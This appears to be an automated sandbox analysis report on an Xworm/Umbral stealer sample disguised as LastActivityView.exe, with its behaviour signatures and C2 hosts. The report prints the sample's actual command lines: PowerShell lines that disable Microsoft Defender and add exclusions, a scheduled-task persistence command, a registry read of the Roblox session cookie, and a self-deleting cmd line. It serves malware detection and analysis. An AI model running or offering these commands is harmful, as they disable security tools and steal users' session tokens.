Malware Analysis Report

2024-10-10 10:07

Sample ID 240506-3kw61sbe22
Target LastActivityView.exe
SHA256 6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b
Tags: umbral xworm execution persistence rat spyware stealer trojan
Score: 10/10

Analysis Overview

Threat Level: Known bad

The file LastActivityView.exe was found to be: Known bad.

Malicious Activity Summary

Xworm family

Detect Umbral payload

Xworm

Umbral

Detect Xworm Payload

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Enumerates physical storage devices

Unsigned PE

Runs ping.exe

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Creates scheduled task(s)

Analysis: static1

Detonation Overview

Reported

2024-05-06 23:34

Signatures

Detect Xworm Payload

Xworm family

xworm

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-06 23:34

Reported

2024-05-06 23:37

Platform

win10-20240404-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe"

Signatures

Detect Umbral payload

Detect Xworm Payload

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\syjcie.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052 = "C:\\ProgramData\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe" C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A 4.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1448 wrote to memory of 96 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Windows\System32\schtasks.exe
PID 1448 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe C:\Users\Admin\AppData\Local\Temp\syjcie.exe
PID 4668 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\SYSTEM32\attrib.exe
PID 4668 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\System32\Wbem\wmic.exe
PID 4668 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\syjcie.exe C:\Windows\SYSTEM32\cmd.exe
PID 4908 wrote to memory of 1096 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe

"C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LastActivityView.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052" /tr "C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe"

C:\Users\Admin\AppData\Local\Temp\syjcie.exe

"C:\Users\Admin\AppData\Local\Temp\syjcie.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\syjcie.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\syjcie.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\syjcie.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

Network


Files
